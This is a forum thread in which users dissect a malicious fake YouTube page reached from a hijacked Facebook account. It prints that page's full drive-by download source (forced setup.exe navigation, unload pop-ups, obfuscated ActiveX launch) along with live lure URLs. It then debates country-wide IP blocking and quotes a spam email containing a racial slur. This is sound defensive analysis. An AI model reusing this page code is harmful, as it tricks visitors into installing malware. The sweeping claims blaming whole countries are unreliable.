
A friend's Facebook account has been taken over by Lord knows what. I reckon that it's some kind of trojan that takes advantage of anyone who stays logged in, or one that logs keystrokes to gain the login details. In the past day or two, his account has been sending links like crazy. I decided to take a look at the site (after turning off scripting in my browser, of course).

 

The site is at:

http://www.petromedika.home.pl/1/

 

It's just an image of what appears to be a video. The source is:


<html>
<title>Amazing Video</title>
<body>
<img src="b456.jpg"  width="200" height="200" onMouseOver="mytest()" />
<script>
// Called from the <img> onMouseOver attribute: moving the pointer over the
// fake video thumbnail is enough to navigate to go.php (a relative URL, so the
// same host and directory); no click is needed. Like any inline event handler,
// it only runs when scripting is enabled in the browser.
function mytest(){
location = "go.php";}
</script>
</body>
</html>

 

Should I check out go.php? Shouldn't I be safe, considering I have JS turned off and don't download anything?


I did it anyway. Go.php redirects to another website's IP address. I was prompted to download the newest version of Flash Player, even though I'm pretty sure that my Flash Player is up to date.

 

http://68.203.229.210/pid=1000/view/console=yes

 

<html>
<!-- LABEL_CODEC -->
<head>
<title>Loading</title>
<meta name="robots" content="noindex,nofollow,noarchive"> 
<script>
// Analyst note: handleError is installed as window.onerror. When any uncaught
// script error occurs it tries to point the parent window, then the top window,
// at this page's own URL; both attempts swallow their own exceptions.
// The trailing statement reads window.parent.document.body.innerHTML whenever
// the parent reports frames. Presumably this is a frame-escape trick: if the
// page is framed by another origin that read should throw and reach
// handleError. Confirm in a sandboxed browser before relying on this.
function handleError(){try{window.parent.location=location;}catch(e){}try{window.top.location=location;}catch(e){}}window.onerror=handleError;if(window.parent.frames.length>0){if(window.parent.document.body.innerHTML){}}
</script>
<script>
// Analyst note: this block is active only when the page URL contains
// "console=yes". It registers exiter() for the window's unload event, so that
// leaving the page asks the browser to open the current URL again and then a
// second URL stored in dangerWindAdr.
if (location.href.indexOf('console=yes') != -1) {
// Assigned without var, so this becomes a global variable.
dangerWindAdr = 'http://heedlessinfo.cn/?pid=312s02&sid=4db12f';
// Internet Explorer only: record window.isIE and the major version parsed from the user-agent string.
if (navigator.appVersion.indexOf('MSIE') > 0) { window.isIE =  true;  function msieversion() { var ua = window.navigator.userAgent; var msie = ua.indexOf("MSIE "); if (msie > 0) return parseInt(ua.substring(msie + 5, ua.indexOf(".", msie))); return 0; } window.IEversion = msieversion(); }
// IE < 6 uses window.open; IE >= 6 calls launchURL() on the element with id
// "iie" (the hidden OBJECT written by the next script block) instead of
// window.open, presumably so the new window is not treated as a script pop-up.
// Every other browser is simply navigated to the address.
function openDangerWindow(adr) { if (window.isIE) { if (window.IEversion < 6) { window.open(adr); } else { try { document.getElementById('iie').launchURL(adr); } catch(ex) {} } } else { location.href = adr; } }
function exiter(){ openDangerWindow(window.location.href); openDangerWindow(dangerWindAdr); return false; }
// The attachEvent call is wrapped in eval() of a string literal; the code runs
// the same without it, so the wrapper looks like light obfuscation.
if (window.attachEvent) eval("window.attachEvent('onunload',exiter);"); else window.addEventListener("unload", exiter, false);
}
</script>
<!-- Analyst note: the string fragments below concatenate to a zero-size OBJECT element with id "iie" and CLASSID "CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6" (the Windows Media Player ActiveX control, as far as this reviewer knows), type "application/x-oleobject", with PARAMs SendPlayStateChangeEvents=True, AutoStart=True, uiMode=none and PlayCount=9999. Splitting the tag and the class id across string literals keeps the literal words OBJECT, CLASSID and the full GUID out of the page source, which defeats plain substring matching; scanners need to evaluate or normalise the concatenation first. -->
<script type="text/javascript">document.write('<OBJ'+'ECT id="i'+'ie" width="0" height="0" style="position:absolute; left:0;top:0;" CLAS'+'SID="CLS'+'ID:6BF'+'52A'+'52-394A-11'+'d3-B153-00C04F'+'79FAA6" type="application/x-ole'+'obje'+'ct"> <PA'+'RAM NAME="Sen'+'dPlayStateCha'+'ngeEvents" VALUE="True"> <PA'+'RAM NAME="Au'+'toSt'+'art" VALUE="True">	<PAR'+'AM name="uiMo'+'de" value="none"> <PA'+'RAM name="Play'+'Count" value="9999"></OBJECT>');</script>
<script language="javascript">AC_FL_RunContent = 0;</script>
<script language="javascript">
// Coarse browser/platform flags derived from navigator strings. The Flash
// helper functions that follow read them to choose between the <object>
// (IE on Windows, not Opera) and <embed> code paths.
var isIE = navigator.appVersion.indexOf("MSIE") !== -1;
var isWin = navigator.appVersion.toLowerCase().indexOf("win") !== -1;
var isOpera = navigator.userAgent.indexOf("Opera") !== -1;
/**
 * Probes the Flash ActiveX control (IE only) and returns its version.
 *
 * Tries the ProgIDs ShockwaveFlash.ShockwaveFlash.7, .6, .3 and finally the
 * unversioned one, stopping at the first that yields a version.
 *
 * @returns {string|number} the control's "$version" string, one of the
 *   hard-coded "WIN x,y,z,w" fallbacks below, or -1 when no control could be
 *   created.
 */
function ControlVersion() {
var version;
var axo;
var e;
try {
	axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
	version = axo.GetVariable("$version");
} catch (e) {}
if (!version) {
	try {
		axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");
		// Statement order matters: the fallback string is stored first, so if
		// either of the next two lines throws, the empty catch leaves
		// "WIN 6,0,21,0" in place.
		version = "WIN 6,0,21,0";
		axo.AllowScriptAccess = "always";
		version = axo.GetVariable("$version");
	} catch (e) {}
}
if (!version) {
	try {
		axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
		version = axo.GetVariable("$version");
	} catch (e) {}
}
if (!version) {
	try {
		// Same ProgID as above; reached when GetVariable failed, so a fixed
		// string is reported if the object can still be created.
		axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
		version = "WIN 3,0,18,0";
	} catch (e) {}
}
if (!version) {
	try {
		axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
		version = "WIN 2,0,0,11";
	} catch (e) {
		// No Flash ActiveX control could be instantiated at all.
		version = -1;
	}
}
return version;
}
/**
 * Returns the installed Flash version, or -1 when none is found.
 *
 * With a non-empty navigator.plugins list the result is a
 * "major.minor.revision" string built from the plugin description. Otherwise
 * WebTV user agents map to the fixed numbers 4, 3 or 2, and IE on Windows
 * (not Opera) returns whatever ControlVersion() reports.
 *
 * @returns {string|number}
 */
function GetSwfVer() {
var flashVer = -1;
if (navigator.plugins != null && navigator.plugins.length > 0) {
	if (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]) {
		var swVer2 = navigator.plugins["Shockwave Flash 2.0"] ? " 2.0" : "";
		var flashDescription = navigator.plugins["Shockwave Flash" + swVer2].description;
		// The description is split on spaces: token 2 is read as "major.minor"
		// and token 3 as the revision (token 4 when token 3 is empty).
		var descArray = flashDescription.split(" ");
		var tempArrayMajor = descArray[2].split(".");			
		var versionMajor = tempArrayMajor[0];
		var versionMinor = tempArrayMajor[1];
		var versionRevision = descArray[3];
		if (versionRevision == "") {
			versionRevision = descArray[4];
		}
		// Strip a leading "d" or "r" from the revision, and for "r" revisions
		// also drop everything from a later "d" onwards.
		if (versionRevision[0] == "d") {
			versionRevision = versionRevision.substring(1);
		} else if (versionRevision[0] == "r") {
			versionRevision = versionRevision.substring(1);
			if (versionRevision.indexOf("d") > 0) {
				versionRevision = versionRevision.substring(0, versionRevision.indexOf("d"));
			}
		}
		// Re-declares the function-scoped flashVer from the top; same variable.
		var flashVer = versionMajor + "." + versionMinor + "." + versionRevision;
	}
}
else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.6") != -1) flashVer = 4;
else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.5") != -1) flashVer = 3;
else if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1) flashVer = 2;
else if ( isIE && isWin && !isOpera ) {
	flashVer = ControlVersion();
}	
return flashVer;
}
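/**
 * Reports whether the detected Flash version is at least the requested one.
 *
 * @param {number|string} reqMajorVer    required major version
 * @param {number|string} reqMinorVer    required minor version
 * @param {number|string} reqRevision    required revision
 * @returns {boolean} true when GetSwfVer() reports a version greater than or
 *   equal to the requested one; false when Flash is missing, the version is 0,
 *   or the version is lower.
 */
function DetectFlashVer(reqMajorVer, reqMinorVer, reqRevision) {
	// Declared locally. The original assigned versionStr, tempArray,
	// tempString and versionArray without var, which leaks globals in sloppy
	// mode and throws a ReferenceError in strict mode.
	var versionStr = GetSwfVer();
	if (versionStr == -1 || versionStr == 0) {
		// The original returned undefined for 0; false is equally falsy and
		// matches the documented boolean result.
		return false;
	}

	// GetSwfVer() can return a bare number (WebTV branch); coerce to a string
	// so split() cannot throw.
	var versionText = String(versionStr);
	var versionArray;
	if (isIE && isWin && !isOpera) {
		// ActiveX format: "WIN 9,0,124,0" -> take the part after the space.
		var afterPlatform = versionText.split(" ")[1] || "";
		versionArray = afterPlatform.split(",");
	} else {
		// Plugin format: "9.0.124".
		versionArray = versionText.split(".");
	}

	// Number() mirrors the implicit coercion the original comparisons used
	// (a missing component becomes NaN and therefore never compares true).
	var versionMajor = Number(versionArray[0]);
	var versionMinor = Number(versionArray[1]);
	var versionRevision = Number(versionArray[2]);
	var wantMajor = parseFloat(reqMajorVer);
	var wantMinor = parseFloat(reqMinorVer);
	var wantRevision = parseFloat(reqRevision);

	if (versionMajor > wantMajor) {
		return true;
	}
	if (versionMajor == wantMajor) {
		if (versionMinor > wantMinor) {
			return true;
		}
		if (versionMinor == wantMinor && versionRevision >= wantRevision) {
			return true;
		}
	}
	return false;
}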
/**
 * Appends a file extension to a movie path.
 *
 * When src carries a query string the extension is inserted just before the
 * first "?"; otherwise it is appended at the end.
 *
 * @param {string} src - path, optionally followed by "?query"
 * @param {string} ext - extension including the dot, e.g. ".swf"
 * @returns {string}
 */
function AC_AddExtension(src, ext) {
  var hasQuery = src.indexOf('?') !== -1;
  if (!hasQuery) {
    return src + ext;
  }
  return src.replace(/\?/, ext + '?');
}
/**
 * Writes the plugin markup into the document with document.write().
 *
 * IE on Windows (not Opera) gets an <object> element built from objAttrs plus
 * one <param> per entry in params; every other browser gets an <embed> element
 * built from embedAttrs.
 *
 * NOTE(review): names and values are placed between double quotes without any
 * HTML escaping, so they must already be safe attribute text.
 *
 * @param {Object} objAttrs   attributes for the <object> tag
 * @param {Object} params     name/value pairs for <param> children
 * @param {Object} embedAttrs attributes for the <embed> tag
 */
function AC_Generateobj(objAttrs, params, embedAttrs) {
  var pieces = [];
  var key;
  if (!(isIE && isWin && !isOpera)) {
    pieces.push('<embed ');
    for (key in embedAttrs) {
      pieces.push(key + '="' + embedAttrs[key] + '" ');
    }
    pieces.push('> </embed>');
  } else {
    pieces.push('<object ');
    for (key in objAttrs) {
      pieces.push(key + '="' + objAttrs[key] + '" ');
    }
    pieces.push('>');
    for (key in params) {
      pieces.push('<param name="' + key + '" value="' + params[key] + '" /> ');
    }
    pieces.push('</object>');
  }
  document.write(pieces.join(''));
}
/**
 * Embeds a Flash movie. Takes a flat list of alternating attribute names and
 * values, sorts them with AC_GetArgs (".swf" extension, "movie" source param,
 * Flash class id and MIME type) and writes the markup with AC_Generateobj.
 */
function AC_FL_RunContent() {
  var flashClassId = "clsid:d27cdb6e-ae6d-11cf-96b8-444553540000";
  var flashMimeType = "application/x-shockwave-flash";
  var parsed = AC_GetArgs(arguments, ".swf", "movie", flashClassId, flashMimeType);
  AC_Generateobj(parsed.objAttrs, parsed.params, parsed.embedAttrs);
}
/**
 * Embeds a Shockwave (.dcr) movie. Takes a flat list of alternating attribute
 * names and values, sorts them with AC_GetArgs (".dcr" extension, "src" source
 * param, Shockwave class id, no MIME type) and writes the markup with
 * AC_Generateobj.
 */
function AC_SW_RunContent(){
  var shockwaveClassId = "clsid:166B1BCA-3F9C-11CF-8075-444553540000";
  var parsed = AC_GetArgs(arguments, ".dcr", "src", shockwaveClassId, null);
  AC_Generateobj(parsed.objAttrs, parsed.params, parsed.embedAttrs);
}
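/**
 * Sorts a flat [name, value, name, value, ...] list into the three attribute
 * groups needed to build plugin markup.
 *
 * Names are matched case-insensitively but stored under the spelling the
 * caller used. "classid" from the caller is ignored; the classid argument is
 * always used instead.
 *
 * Fix over the original: the switch compared the lower-cased name against
 * "ondblClick", which can never match, so a double-click handler fell through
 * to the default branch and was emitted as a <param>/<embed> attribute. It is
 * now grouped with the other event handlers in objAttrs. The caller's list is
 * also no longer modified when the extension is appended to src/movie.
 *
 * @param {ArrayLike<string>} args  alternating attribute names and values
 * @param {string} ext              extension appended to the movie path
 * @param {string} srcParamName     <param> name that carries the movie path
 * @param {string} classid          classid written to objAttrs
 * @param {?string} mimeType        when truthy, stored as embedAttrs.type
 * @returns {{embedAttrs: Object, params: Object, objAttrs: Object}}
 */
function AC_GetArgs(args, ext, srcParamName, classid, mimeType){
  var ret = {
    embedAttrs: {},
    params: {},
    objAttrs: {}
  };
  for (var i = 0; i < args.length; i = i + 2){
    var name = args[i];
    var value = args[i + 1];
    switch (name.toLowerCase()){
      case "classid":
        // Caller-supplied class ids are dropped on purpose.
        break;
      case "pluginspage":
        ret.embedAttrs[name] = value;
        break;
      case "src":
      case "movie":
        var moviePath = AC_AddExtension(value, ext);
        ret.embedAttrs["src"] = moviePath;
        ret.params[srcParamName] = moviePath;
        break;
      case "onafterupdate":
      case "onbeforeupdate":
      case "onblur":
      case "oncellchange":
      case "onclick":
      case "ondblclick":
      case "ondrag":
      case "ondragend":
      case "ondragenter":
      case "ondragleave":
      case "ondragover":
      case "ondrop":
      case "onfinish":
      case "onfocus":
      case "onhelp":
      case "onmousedown":
      case "onmouseup":
      case "onmouseover":
      case "onmousemove":
      case "onmouseout":
      case "onkeypress":
      case "onkeydown":
      case "onkeyup":
      case "onload":
      case "onlosecapture":
      case "onpropertychange":
      case "onreadystatechange":
      case "onrowsdelete":
      case "onrowenter":
      case "onrowexit":
      case "onrowsinserted":
      case "onstart":
      case "onscroll":
      case "onbeforeeditfocus":
      case "onactivate":
      case "onbeforedeactivate":
      case "ondeactivate":
      case "type":
      case "codebase":
      case "id":
        // Event handlers and object-only attributes.
        ret.objAttrs[name] = value;
        break;
      case "width":
      case "height":
      case "align":
      case "vspace":
      case "hspace":
      case "class":
      case "title":
      case "accesskey":
      case "name":
      case "tabindex":
        // Presentation attributes valid on both tags.
        ret.embedAttrs[name] = ret.objAttrs[name] = value;
        break;
      default:
        // Everything else is a plugin parameter.
        ret.embedAttrs[name] = ret.params[name] = value;
    }
  }
  ret.objAttrs["classid"] = classid;
  if (mimeType) ret.embedAttrs["type"] = mimeType;
  return ret;
}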
</script>
<script>
// Analyst note: every click and every key press anywhere in the document is
// routed to _sjhdgfj22, the function defined further down in this script that
// navigates to setup.exe. Any interaction with the page therefore starts the
// executable download.
document.onclick = _sjhdgfj22;
document.onkeydown = _sjhdgfj22;
// Returns the value of the query parameter `name` from the unescaped page URL,
// or "" when it is absent. The capture group is ([^]*), which in JavaScript
// matches every remaining character, so the result runs to the end of the URL
// rather than stopping at the next "&". NOTE(review): this looks like a
// mangled copy of the common [^&#]* pattern. Nothing in the visible page
// calls this function.
function gup( name ){  name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");  var regexS = "[\\?&]"+name+"=([^]*)";  var regex = new RegExp( regexS );  var results = regex.exec( unescape(window.location.href) );  if( results == null )    return "";  else    return results[1];}
// Decodes a parameter value in two passes: each pair of hex digits becomes one
// character, then every character code is XORed with 128. Analysts can apply
// the same two steps to read the "ch"/"ea" values in captured URLs.
// The loop variables i and l are assigned without var and so are globals.
function mydecode(str) { var s = ""; for (i = 0, l = str.length; i < l; i += 2) { s += String.fromCharCode(parseInt(str.substr(i, 2), 16)); } var e = ""; for (i = 0, l = s.length; i < l; i ++) { e += String.fromCharCode(s.charCodeAt(i) ^ 128); } return e; }
// Analyst note: body onload handler. It (1) schedules _sjhdgfj22 three seconds
// after load, so the setup.exe navigation happens even if the visitor touches
// nothing, and (2) fills in the fake video page from the query string.
function pageLoaded() { setTimeout("_sjhdgfj22();", 3000);
var a = '', b = '';
var p1 = new String(unescape(window.location.search.substr(1))).split('&');
// A parameter whose name contains "ch" supplies the avatar address and one
// whose name contains "ea" supplies the poster name; both are run through
// mydecode(). Presumably the sender of the link fills these in so the lure
// shows a familiar name and picture (not confirmed by anything on this page).
for (var i = 0; i < p1.length; i ++) { var p2 = new String(p1[i]).split('='); if (p2.length == 2) { if (p2[0].indexOf('ch') != -1) a = mydecode(p2[1]); else if (p2[0].indexOf('ea') != -1) b = mydecode(p2[1]); } }
try {
var avatar = "http://" + a;
if (a == "") avatar = "wizard.jpg";
var name = b;
if (name == "") name = "* Tiger *";
// The title deliberately misspells the video site's name ("YuoTube"), a
// useful string to search for in proxy or browser-history records.
document.title = 'YuoTube :: Broadcast Yourself :: Video posted by ' + name;
// The decoded name is written with innerHTML, without escaping.
document.getElementById('p0').innerHTML = 'Video posted by ' + name;
document.getElementById('p1').innerHTML = name;
document.getElementById('img0').src = avatar;
} catch (e) {}
}
// Navigates to the relative URL "setup.exe", i.e. an executable served from
// the same host and path as this page. This is the single payload trigger: it
// is wired to document.onclick and document.onkeydown, to the 3-second timer
// in pageLoaded(), and to the onclick attribute of the fake links in the body.
function _sjhdgfj22() { location.href = "setup.exe"; }

</script>
<style>
body { font-family: Tahoma; color: black; font-size: 12px; background-color: #ffffff; }
td, a, b { font-size: 12px; }
.b { border: 1px solid #cccccc; height: 35px; }
.b b { font-size: 20px; }
</style>
</head>
<body onload="pageLoaded()">
<table width="900" border="0" align="center">
<tr>
  <td><table width="100%" border="0">
      <tr>
        <td> </td>
        <td align="right"><a href="#" onclick="_sjhdgfj22(); return false;"><b>Sign Up</b></a> | <a href="#" onclick="_sjhdgfj22(); return false;">QuickList</a> (0) | <a href="#" onclick="_sjhdgfj22(); return false;">Help</a> | <a href="#" onclick="_sjhdgfj22(); return false;">Log in</a> </td>

      </tr>
    </table>
    <h1 id='p0'>Video posted by</h1>
    <table width="100%" border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td width="660px" align="left" valign="top"><table  style="padding: 0px 15px 0px 0px;" width="100%" border="0" cellpadding="0" cellspacing="0">
            <tr>
              <td><script language="javascript">
	// Embeds the "player" movie through the AC_FL_RunContent helper. Both 'src'
	// and 'movie' are the relative path 'player?pid=6123'; AC_GetArgs appends
	// ".swf" before the query string, giving player.swf?pid=6123 on the same
	// host, the same file the <noscript> fallback below references.
	AC_FL_RunContent(
		'codebase', 'http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0',
		'width', '640',
		'height', '390',
		'src', 'player?pid=6123',
		'quality', 'high',
		'pluginspage', 'http://www.macromedia.com/go/getflashplayer',
		'align', 'middle',
		'play', 'true',
		'loop', 'true',
		'scale', 'showall',
		'wmode', 'window',
		'devicefont', 'false',
		'id', 'player',
		'bgcolor', '#000000',
		'name', 'player',
		'menu', 'false',
		'allowFullScreen', 'false',
		'allowScriptAccess','sameDomain',
		'movie', 'player?pid=6123',
		'salign', ''
		);
	</script>

                <noscript>
                <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="480" height="390" id="player" align="middle">
                  <param name="allowScriptAccess" value="sameDomain" />
                  <param name="allowFullScreen" value="false" />
                  <param name="movie" value="player.swf?pid=6123" />
                  <param name="menu" value="false" />
                  <param name="quality" value="high" />
                  <param name="bgcolor" value="#000000" />
                  <embed src="player.swf?pid=6123" menu="false" quality="high" bgcolor="#000000" width="640" height="390" name="player" align="middle" allowScriptAccess="sameDomain" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />

                </object>
                </noscript></td>
            </tr>
          </table>
          <br/>
          <h3>Video Responses: <u>10</u>   Text Comments: <u>70</u></h3><br>
          <br>

          </div>
          <a onclick="_sjhdgfj22(); return false;" class="watch-comment-auth" href="#" rel="nofollow">babachat</a> (4 hours ago)<br>
          Funniest thing EVER!! <br>
          <br>
          <a onclick="_sjhdgfj22(); return false;" class="watch-comment-auth" href="#" rel="nofollow">csmith1199</a> (6 hours ago) <br>

          WooHoo!! Love this vid!!! Congrats on the front page!!!! :-) <br>
          <br>
          <a onclick="_sjhdgfj22(); return false;" class="watch-comment-auth" href="#" rel="nofollow">sinmike1</a> (7 hours ago)<br>
          that.... was .......GREAT !!! <br>
          <br>
          <a onclick="_sjhdgfj22(); return false;" class="watch-comment-auth" href="#" rel="nofollow">ah17</a> (10 hours ago)<br>

          Nice vid  <br>
          <br>
          <br>
          <br>
          <br>
          <br>
          <a href="#" onclick="_sjhdgfj22(); return false;">Next</a> Pages: 1 <a href="#" onclick="_sjhdgfj22(); return false;">2</a> <a href="#" onclick="_sjhdgfj22(); return false;">3</a>  ... 

          </div>
          <a href="#" class="hLink" onclick="_sjhdgfj22(); return false;" rel="nofollow">View all 70 comments</a><br>
          <br>
          <br>
          <h2>Would you like to comment?</h2>
          <a href="#" onclick="_sjhdgfj22(); return false;">Join</a> for a free account, or <a href="#" onclick="_sjhdgfj22(); return false;">sign in</a> if you are already a member. </td>

        <td align="right" valign="top"><table style="background-color: #eeeeee" class="b" width="360" border="0" cellpadding="0" cellspacing="0">
            <tr>
              <td align="center" valign="middle"><br/><img border="0" src="" id='img0'></td>
              <td width="5"></td>
              <td width="200" valign="middle" align="left">From: <a href="#" onclick="_sjhdgfj22(); return false;" id='p1'> </a><br/>
                Joined: 1 year ago<br/>
                Videos: 5<br/>

                <br/><a href="#" onclick="_sjhdgfj22(); return false;" title="subscribe to wizard's videos"> Subscribe </a></td>
            </tr>
            <tr>
              <td colspan="3" align="center"> </td>
            </tr>
            <tr>
              <td align="left" colspan="3"> </td>
            </tr>

            <tr>
              <td colspan="3" align="center"><hr style="width: 340px; color: #cccccc; height: 1px"></td>
            </tr>
            <tr>
              <td align="left" colspan="2"> Embed:</td>
              <td align="right"><a href="#" onclick="_sjhdgfj22(); return false;">Customize</a></td>
            </tr>
            <tr>

              <td colspan="3" align="center"><br/>
                <input value='<object width="425" height="344"><param name="movie" value="http://..."></param><embed src="http://..." type="application/x-shockwave-flash" width="425" height="344"></embed></object>' type="text" style="width: 340px"></td>
            </tr>
          </table>
          <br>
          <table style="background-color: #eeeeee" class="b" width="360" border="0" cellpadding="0" cellspacing="0">
            <tr>
              <td align="center" valign="middle"><div align="left"><a href="#" class="expand-header" onclick="_sjhdgfj22(); return false;">More From user</a><br/>

                  <br>
                  <a href="#" onclick="_sjhdgfj22(); return false;" class="expand-header">Related Videos</a></div>
                </div></td>
            </tr>
          </table></td>
      </tr>
    </table>
    <br><br><br><br><br><br><br><br>

    <br><br><br><br><br><br><br>
12:34
    </center>
    <br>
    <br>
<!-- /LABEL_CODEC -->
<!-- /LABEL_EXP -->

<div id="Layer1" style="position:absolute; left:0px; top:0px; width:100px; height:100px; z-index:1; visibility: hidden;">
<!-- counter here -->



<!-- counter here -->

</div>

</body>
</html>


I notice one of the domains says '.cn'.  I think most spyware/virus/email spam comes from China and sometimes Russia.  I have received spam email where  they had loaded an image into the email some how bypassing Windows live mail's image removal. The images were linked from a .info domain, that resolved to a Chinese IP address!! Also in my own  Server, sometimes I check the IPs of the spam emails that end up in my Squirrel Mail.. They resolve to Russia and sometimes Poland.

 

I have been meaning to just block China at the firewall on my own computer.  I block China on my server; it's just that Windozo doesn't have a decent firewall like iptables. Because obviously this would be a good idea, since it would decrease the likelihood of you getting a virus if you can't connect to their website to download it. ;)

 

 

btw 68.203.229.210 (the IP linked above) resolves to Road Runner ISP. I believe that's a residential ISP. So that is probably a hacked/compromised zombie machine hosting that site.

 

petromedika.home.pl resolves to 62.129.200.127, which is in Poland.

 

These are the countries I would block on your home computer if you have something good like iptables.

 

+ Poland

+ Russia

+ China


Oh great. You're gonna block home.pl, the largest hosting company in Poland just because one of the sites hosted there has been hacked into. :P

 

I have had 3 encounters with home.pl in the past, and each time it was something trying to make me download a virus. That doesn't speak well. Poland as a whole is probably not a bad place, and neither is China. It's just that some countries have crappy net laws, so a few bad apples can do this criminal online stuff for years, smearing the IP space of that country with bad publicity and getting it into blacklists.  :D

 


Law of large numbers. It is the biggest hosting company, they have most cases of compromised sites.

Same goes for my ISP provider. Largest in the country === most widely used by script kiddies === I need webproxy to access half of the internet.

 

Why don't you lock out the IP where the executable downloads itself? It's in... GASP.... USA!!!

OrgName:    Road Runner HoldCo LLC

OrgID:      RRSW

Address:    13241 Woodland Park Road

City:      Herndon

StateProv:  VA

PostalCode: 20171

Country:    US

 

 


Well yeah, that will get it blacklisted. See, in my country (Canada), if I hack websites etc. and my ISP receives an abuse report, or maybe there is the likelihood of a criminal investigation, I could get cut off by my ISP and also be charged with some kind of cyber crime.

 

In some countries like Russia, China, Turkey, Poland, etc., they don't, and they get away with it. Probably because international law can't reach into their country to convict them of cyber crime. Or maybe the ISP just doesn't take care of abuse requests.  If you were running an ISP, wouldn't you cut off customers that are getting your IP space blacklisted? That seems to be good business sense to me. You would want your customers to be able to view the internet properly without getting blocked all the time. So your own ISP is probably not even cutting off these 'script kiddies' and banning them from any further access on their network. Yes, you can end up in a company's black book. It's called getting banned. If you steal from a store you can get banned from that store. For the same reason, if you were running an ISP you would ban customers from ever signing up again.

 

Law of large numbers. It is the biggest hosting company, they have most cases of compromised sites.

Same goes for my ISP provider. Largest in the country === most widely used by script kiddies === I need webproxy to access half of the internet.

 

Why don't you lock out the IP where the executable downloads itself? It's in... GASP.... USA!!!

OrgName:    Road Runner HoldCo LLC

OrgID:      RRSW

Address:    13241 Woodland Park Road

City:      Herndon

StateProv:  VA

PostalCode: 20171

Country:    US


Well yeah, that will get it blacklisted. See, in my country (Canada), if I hack websites etc. and my ISP receives an abuse report, or maybe there is the likelihood of a criminal investigation, I could get cut off by my ISP and also be charged with some kind of cyber crime.

 

 

As long as I pay my bill, my ISP doesn't care one bit what I do.  Now, if the FBI or some other law enforcement agency made them care, then suddenly they would have a very strong interest in what I was doing.  I would imagine the same goes in Canada.  I would imagine even the same goes in Poland and all those other countries, just maybe as much pressure isn't put on ISPs.  When it comes down to it, ISPs are there to make money.

 

 

"If you steal from store you can get banned from that store."

 

I think you're looking at it the wrong way.  Think about it with this metaphor:

 

If I sell a gun to someone, is it my responsibility to make sure he doesn't shoot anyone with that gun?


That doesn't make good business sense. Maybe they do run the ISP like that in your country; perhaps that's why Mchl has to use web proxies to access some websites. Why would an ISP want people on their network getting it into blacklists? This creates a bad experience for the rest of your customers. You would respond to abuse reports and give the customers warnings. If they fail to comply or fix the problem, cut them off. You never know, maybe their computer was a zombie, so they can reformat the computer and fix the security issue; or if they are indeed a script kiddie, well, not having an internet connection seems to me to be a good reason to find a new hobby. How about maybe actually being constructive, rather than trying to destroy other people's websites? And yes despite popular opinion you can't get banned from a store, you step foot in that store again it's called trespassing. I don't see how the logic of a gun fits into that.

 


Because when you're stealing from a store, you're doing bad to the store.  So, following that metaphor, you would be harming the ISP.  But that's not the case.  People doing harm using the internet are not (directly, since indirectly they could lose customers) harming their ISPs; they're harming the people against whom they're doing harm (which was maybe the most redundant thing I've said in a week).  Aside from getting blacklisted and losing customers, ISPs are not harmed by malicious things people do using their services (unless those malicious things involve disrupting the ISP's business model).

 

 

So, I feel that the gun-shop example would be more accurate.  The gun store owner is not harmed by the use of the gun.  In fact, no one has to be harmed by the gun.  It could lie dormant indefinitely or it could be used for hunting.

 

But, even that analogy is flawed since the gun shop owner doesn't lose sales if someone buys a gun from him and shoots someone.

 

A more valid analogy would have to involve something like magical doors that lead to different areas, and those areas blocking doors based on people who have come through them in the past.

 

 

 

Basically what it comes down to is whether it's worth the ISP's time to monitor their users and follow abuse reports.  If they lose x future customers because they fear being blocked on websites, it's only worth avoiding being blocked if those customers would make up the money lost when following y reports.

 

 

 

 

 

I think it's stupid for a website to block an entire ISP based on a few rogue users.  Now, if the website were getting DDoS'd by a net from the same ISP, that I would understand, but otherwise, I think that's stupid.

 

 

I guess I'm biased in this since I don't think an ISP's responsibilities include monitoring their users.  I think if a law enforcement agency gets involved, the ISP should turn over all related information and stuff, but without that, I don't think it's the ISP's job.  Then again, if the ISP doesn't do it, I'm not sure who would since it's not like the local cops job should include that either.  Blerh, now that I think about that, I have no idea whose job it should really be.  I feel like the ISP shouldn't do that, but that no existing enforcement agency would be right for it.


 

In some countries like Russia, China, Turkey, Poland, etc., they don't, and they get away with it. Probably because international law can't reach into their country to convict them of cyber crime.

 

Don't know how about others in this mix, but Polish laws are in accordance with EU laws. Anyhow, I've written to home.pl support, and they pulled the page down within hours.


I've had bad experience with a .pl website. I was going through some Alpha Centauri fan sites, when bam! I hit a .pl site, it installs a virus!

 

Worst part about the virus is it installed by me clicking the "X" button on a pop-up. QQ

 

I don't visit Russian or Chinese websites, so I don't know about those.


The Gumblar attack started in March with websites being compromised and attack code hidden on them. Originally, the malware downloaded onto computers accessing those sites came from the gumblar.cn domain, a Chinese domain associated with Russian and Latvian IP addresses

http://news.zdnet.com/2100-9595_22-306268.html

 

 

::)


I found an easy-to-use firewall for Windows to protect you from these shady websites that are usually hosted in "x" country: http://www.peerblock.com. You can download the IP ranges of any country at http://iblocklist.com and configure it.

 

 

Edit: *it works* lol

 

Here is spam email from my hotmail.

 

Science New Insights‏
From: 	Swindall (<removed>)
Sent: 	November 7, 2009 2:07:10 AM
To: 	<removed>

Obama's nigro-solo http://www.mufahww.cn/

(c) 2009 Hiotarakaryywyi. All right reserved.

 

qqqyvr.jpg

